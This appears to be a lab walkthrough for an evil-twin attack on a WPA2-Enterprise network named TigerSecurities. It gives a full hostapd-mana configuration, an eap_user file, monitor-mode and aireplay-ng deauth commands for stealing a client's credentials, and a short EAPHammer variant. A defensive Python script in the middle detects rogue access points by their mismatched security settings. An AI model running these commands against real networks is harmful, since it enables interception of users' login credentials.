Evil Twin

Two dual-band WiFi interfaces are available on the lab machine. A WiFi network is present in the vicinity of the lab machine and a client is connected to it. Here are the details of the network:

| Parameter | Value |
| --- | --- |
| SSID | TigerSecurities |
| Security | WPA2-Enterprise |

Objective: Deploy an evil twin using Hostapd-mana. Force the client to join the evil twin network to steal the user's credentials.

Start the iw dev dance and check for surrounding networks.

iw dev wlan0 set monitor none

airodump-ng wlan0

Create the mana config file and the eap_user file:

# mana config
interface=wlan1
ssid=TigerSecurities
channel=6
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
private_key_passwd=
dh_file=/root/certs/dhparam.pem
mana_wpe=1
mana_eapsuccess=1

# eap_user file (hostapd.eap_user)
* PEAP,TTLS,TLS,MD5,GTC
"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP "1234test" [2]

Run hostapd-mana with the config file and observe that the evil twin network is now active.

Start a deauth attack on the access point:

aireplay-ng -0 100 -a {BSSID} wlan0 --ignore-negative-one

The client is now connected to our access point and we can view the captured credentials.
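On the monitoring side, the mana config above leaves a visible fingerprint: wpa=3 with wpa_pairwise=TKIP CCMP advertises WPA and TKIP next to WPA2/CCMP under the same SSID. The following Python script is an added example, not part of the original lab; it assumes the legitimate network advertises WPA2/CCMP only, and the baseline BSSID, the scan records and the `Beacon`/`audit` names are constructed for illustration.

```python
"""Flag access points that advertise a protected SSID but deviate from its baseline."""
from dataclasses import dataclass

@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str
    wpa_versions: frozenset  # e.g. {"WPA2"} or {"WPA", "WPA2"}
    ciphers: frozenset       # pairwise ciphers, e.g. {"CCMP"}
    akm: str                 # "EAP" for 802.1X, "PSK" for pre-shared key

# Assumed inventory entry for the legitimate network (constructed values).
BASELINE = {
    "TigerSecurities": {
        "bssids": {"02:00:00:aa:bb:01"},
        "wpa_versions": frozenset({"WPA2"}),
        "ciphers": frozenset({"CCMP"}),
        "akm": "EAP",
    }
}

def audit(beacons, baseline=BASELINE):
    """Return {bssid: [reasons]} for beacons of a protected SSID that differ from baseline."""
    findings = {}
    for b in beacons:
        known = baseline.get(b.ssid)
        if known is None:
            continue  # SSID is not one we protect
        reasons = []
        if b.bssid.lower() not in known["bssids"]:
            reasons.append("unknown BSSID")
        if b.wpa_versions != known["wpa_versions"]:
            reasons.append("WPA version mismatch")
        extra = b.ciphers - known["ciphers"]
        if extra:
            reasons.append("extra ciphers: " + ",".join(sorted(extra)))
        if b.akm != known["akm"]:
            reasons.append("AKM mismatch")
        if reasons:
            findings[b.bssid] = reasons
    return findings

# Constructed scan records: the real AP, a twin matching the config above, an unrelated AP.
SAMPLE = [
    Beacon("TigerSecurities", "02:00:00:aa:bb:01", frozenset({"WPA2"}), frozenset({"CCMP"}), "EAP"),
    Beacon("TigerSecurities", "02:00:00:cc:dd:02", frozenset({"WPA", "WPA2"}), frozenset({"TKIP", "CCMP"}), "EAP"),
    Beacon("GuestNet", "02:00:00:ee:ff:03", frozenset({"WPA2"}), frozenset({"CCMP"}), "PSK"),
]

if __name__ == "__main__":
    for bssid, reasons in audit(SAMPLE).items():
        print(bssid, "->", "; ".join(reasons))
```

A twin that copies both the BSSID and the advertised security settings passes this check, so clients still need to validate the RADIUS server certificate before sending credentials.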

EAPHammer

Same iw dev dance as above: start EAPHammer and then deauth with aireplay-ng (same as above).

Viewing the client credentials
